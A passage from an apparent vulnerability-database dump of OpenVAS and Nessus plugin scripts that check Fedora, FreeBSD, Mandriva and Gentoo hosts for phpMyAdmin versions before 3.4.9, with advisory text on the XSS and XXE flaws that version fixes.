frequently used operations are supported\n by the user interface (managing databases, tables, fields, relations, indexes,\n users, permissions), while you still have the ability to directly execute any\n SQL statement.\n\n Features include an intuitive web interface, support for most MySQL features\n (browse and drop databases, tables, views, fields and indexes, create, copy,\n drop, rename and alter databases, tables, fields and indexes, maintenance\n server, databases and tables, with proposals on server configuration, execute,\n edit and bookmark any SQL-statement, even batch-queries, manage MySQL users\n and privileges, manage stored procedures and triggers), import data from CSV\n and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument Text\n and Spreadsheet, Word, Excel, LATEX and others, administering multiple servers,\n creating PDF graphics of your database layout, creating complex queries using\n Query-by-example (QBE), searching globally in a database or a subset of it,\n transforming stored data into any format using a set of predefined functions,\n like displaying BLOB-data as image or download-link and much more...\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"phpMyAdmin on Fedora 15\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/071523.html\");\n script_id(863671);\n script_version(\"$Revision: 8352 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-10 08:01:57 +0100 (Wed, 10 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-09 12:52:59 +0530 (Mon, 09 Jan 2012)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17370\");\n script_cve_id(\"CVE-2011-4780\", \"CVE-2011-4782\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2011-17370\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of phpMyAdmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~3.4.9~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-10-08T12:45:25", "bulletinFamily": "scanner", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "modified": "2018-10-05T00:00:00", "published": "2012-02-13T00:00:00", "id": "OPENVAS:136141256231070587", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070587", "title": "FreeBSD Ports: phpMyAdmin", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_phpMyAdmin27.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID 8c83145d-2c95-11e1-89b4-001ec9578670\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70587\");\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_cve_id(\"CVE-2011-4780\", \"CVE-2011-4782\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_version(\"$Revision: 11762 $\");\n script_name(\"FreeBSD Ports: phpMyAdmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: phpMyAdmin\n\nCVE-2011-4780\nMultiple cross-site scripting (XSS) vulnerabilities in\nlibraries/display_export.lib.php in phpMyAdmin 3.4.x before 3.4.9\nallow remote attackers to inject arbitrary web script or HTML via\ncrafted URL parameters, related to the export panels in the (1)\nserver, (2) database, and (3) table sections.\n\nCVE-2011-4782\nCross-site scripting (XSS) vulnerability in\nlibraries/config/ConfigFile.class.php in the setup interface in\nphpMyAdmin 3.4.x before 3.4.9 allows remote attackers to inject\narbitrary web script or HTML via the host parameter.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/8c83145d-2c95-11e1-89b4-001ec9578670.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"phpMyAdmin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.4\")>0 && revcomp(a:bver, b:\"3.4.9.r1\")<0) {\n txt += 'Package phpMyAdmin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-03-18T14:40:19", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-01-09T00:00:00", "id": "OPENVAS:1361412562310863671", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863671", "title": "Fedora Update for phpMyAdmin FEDORA-2011-17370", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2011-17370\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/071523.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863671\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-09 12:52:59 +0530 (Mon, 09 Jan 2012)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17370\");\n script_cve_id(\"CVE-2011-4780\", \"CVE-2011-4782\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2011-17370\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpMyAdmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"phpMyAdmin on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~3.4.9~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-03-13T14:25:32", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-12T00:00:00", "published": "2012-01-09T00:00:00", "id": "OPENVAS:1361412562310831522", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310831522", "title": "Mandriva Update for phpmyadmin MDVSA-2011:198 (phpmyadmin)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for phpmyadmin MDVSA-2011:198 (phpmyadmin)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.mandriva.com/security-announce/2012-01/msg00000.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.831522\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-09 13:30:32 +0530 (Mon, 09 Jan 2012)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"MDVSA\", value:\"2011:198\");\n script_cve_id(\"CVE-2011-4107\", \"CVE-2011-4634\", \"CVE-2011-4782\", \"CVE-2011-4780\");\n script_name(\"Mandriva Update for phpmyadmin MDVSA-2011:198 (phpmyadmin)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpmyadmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\", re:\"ssh/login/release=MNDK_mes5\");\n script_tag(name:\"affected\", value:\"phpmyadmin on Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities has been found and corrected in phpmyadmin:\n\n Importing a specially-crafted XML file which contains an XML entity\n injection permits to retrieve a local file (limited by the privileges\n of the user running the web server) (CVE-2011-4107).\n\n Using crafted database names, it was possible to produce XSS in the\n Database Synchronize and Database rename panels. Using an invalid\n and crafted SQL query, it was possible to produce XSS when editing\n a query on a table overview panel or when using the view creation\n dialog. Using a crafted column type, it was possible to produce XSS\n in the table search and create index dialogs (CVE-2011-4634).\n\n Crafted values entered in the setup interface can produce XSS. Also,\n if the config directory exists and is writeable, the XSS payload can\n be saved to this directory (CVE-2011-4782).\n\n Using crafted url parameters, it was possible to produce XSS\n on the export panels in the server, database and table sections\n (CVE-2011-4780).\n\n This upgrade provides the latest phpmyadmin version (3.4.9) to address\n these vulnerabilities.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpmyadmin\", rpm:\"phpmyadmin~3.4.9~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-06T13:07:01", "bulletinFamily": "scanner", "description": "Check for the Version of phpmyadmin", "modified": "2018-01-05T00:00:00", "published": "2012-01-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=831522", "id": "OPENVAS:831522", "title": "Mandriva Update for phpmyadmin MDVSA-2011:198 (phpmyadmin)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for phpmyadmin MDVSA-2011:198 (phpmyadmin)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been found and corrected in phpmyadmin:\n\n Importing a specially-crafted XML file which contains an XML entity\n injection permits to retrieve a local file (limited by the privileges\n of the user running the web server) (CVE-2011-4107).\n\n Using crafted database names, it was possible to produce XSS in the\n Database Synchronize and Database rename panels. Using an invalid\n and crafted SQL query, it was possible to produce XSS when editing\n a query on a table overview panel or when using the view creation\n dialog. Using a crafted column type, it was possible to produce XSS\n in the table search and create index dialogs (CVE-2011-4634).\n\n Crafted values entered in the setup interface can produce XSS; also,\n if the config directory exists and is writeable, the XSS payload can\n be saved to this directory (CVE-2011-4782).\n\n Using crafted url parameters, it was possible to produce XSS\n on the export panels in the server, database and table sections\n (CVE-2011-4780).\n\n This upgrade provides the latest phpmyadmin version (3.4.9) to address\n these vulnerabilities.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"phpmyadmin on Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2012-01/msg00000.php\");\n script_id(831522);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-09 13:30:32 +0530 (Mon, 09 Jan 2012)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"MDVSA\", value: \"2011:198\");\n script_cve_id(\"CVE-2011-4107\", \"CVE-2011-4634\", \"CVE-2011-4782\", \"CVE-2011-4780\");\n script_name(\"Mandriva Update for phpmyadmin MDVSA-2011:198 (phpmyadmin)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of phpmyadmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpmyadmin\", rpm:\"phpmyadmin~3.4.9~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-10-22T16:42:36", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 201201-01.", "modified": "2018-10-12T00:00:00", "published": "2012-02-12T00:00:00", "id": "OPENVAS:136141256231070802", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070802", "title": "Gentoo Security Advisory GLSA 201201-01 (phpMyAdmin)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201201_01.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70802\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-7251\", \"CVE-2008-7252\", \"CVE-2010-2958\", \"CVE-2010-3055\", \"CVE-2010-3056\", \"CVE-2010-3263\", \"CVE-2011-0986\", \"CVE-2011-0987\", \"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\", \"CVE-2011-2642\", \"CVE-2011-2643\", \"CVE-2011-2718\", \"CVE-2011-2719\", \"CVE-2011-3646\", \"CVE-2011-4064\", \"CVE-2011-4107\", \"CVE-2011-4634\", \"CVE-2011-4780\", \"CVE-2011-4782\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:41 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201201-01 (phpMyAdmin)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities were found in phpMyAdmin, the most severe\n of which allows the execution of arbitrary PHP code.\");\n script_tag(name:\"solution\", value:\"All phpMyAdmin users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-3.4.9'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201201-01\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=302745\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=335490\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=336462\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=354227\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=373951\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=376369\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=387413\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=389427\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=395715\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-1.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-2.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-4.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-5.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-6.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2010-7.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-1.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-10.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-11.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-12.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-17.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-18.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-2.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-9.php\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201201-01.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"dev-db/phpmyadmin\", unaffected: make_list(\"ge 3.4.9\"), vulnerable: make_list(\"lt 3.4.9\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:15:49", "bulletinFamily": "scanner", "description": "Changes 3.4.9.0 (2011-12-21) :\n\n - [edit] Inline editing enum fields with null shows no dropdown\n\n - [interface] DB suggestion not correct for user with underscore\n\n - [core] Magic quotes removed in PHP 5.4\n\n - [session] No feedback when result is empty (signon auth_type)\n\n - [display] Problems regarding ShowTooltipAliasTB\n\n - [edit] Can't rename a database that contains views\n\n - [edit] Unable to move tables with triggers\n\n - [navi] Fast filter broken with table tree\n\n - [GUI] Firefox favicon frameset regression\n\n - [core] Better compatibility with mysql extension\n\n - [security] Self-XSS on export options (export server/database/table), see PMASA-2011-20 (http://www.phpmyadmin.net/home_page/security/PMASA-20 11-20.php)\n\n - [security] Self-XSS in setup (host parameter), see PMASA-2011-19 (http://www.phpmyadmin.net/home_page/security/PMASA-20 11-19.php)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-24T00:00:00", "id": "FEDORA_2011-17369.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=57423", "published": "2012-01-03T00:00:00", "title": "Fedora 16 : phpMyAdmin-3.4.9-1.fc16 (2011-17369)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-17369.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57423);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/12/24 10:14:27\");\n\n script_cve_id(\"CVE-2011-4780\", \"CVE-2011-4782\");\n script_bugtraq_id(51166, 51226);\n script_xref(name:\"FEDORA\", value:\"2011-17369\");\n\n script_name(english:\"Fedora 16 : phpMyAdmin-3.4.9-1.fc16 (2011-17369)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Changes 3.4.9.0 (2011-12-21) :\n\n - [edit] Inline editing enum fields with null shows no\n dropdown\n\n - [interface] DB suggestion not correct for user with\n underscore\n\n - [core] Magic quotes removed in PHP 5.4\n\n - [session] No feedback when result is empty (signon\n auth_type)\n\n - [display] Problems regarding ShowTooltipAliasTB\n\n - [edit] Can't rename a database that contains views\n\n - [edit] Unable to move tables with triggers\n\n - [navi] Fast filter broken with table tree\n\n - [GUI] Firefox favicon frameset regression\n\n - [core] Better compatibility with mysql extension\n\n - [security] Self-XSS on export options (export\n server/database/table), see PMASA-2011-20\n (http://www.phpmyadmin.net/home_page/security/PMASA-20\n 11-20.php)\n\n - [security] Self-XSS in setup (host parameter), see\n PMASA-2011-19\n (http://www.phpmyadmin.net/home_page/security/PMASA-20\n 11-19.php)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-19/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-20/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=769981\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=769982\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-January/071537.html\n script_set_attribute(\n 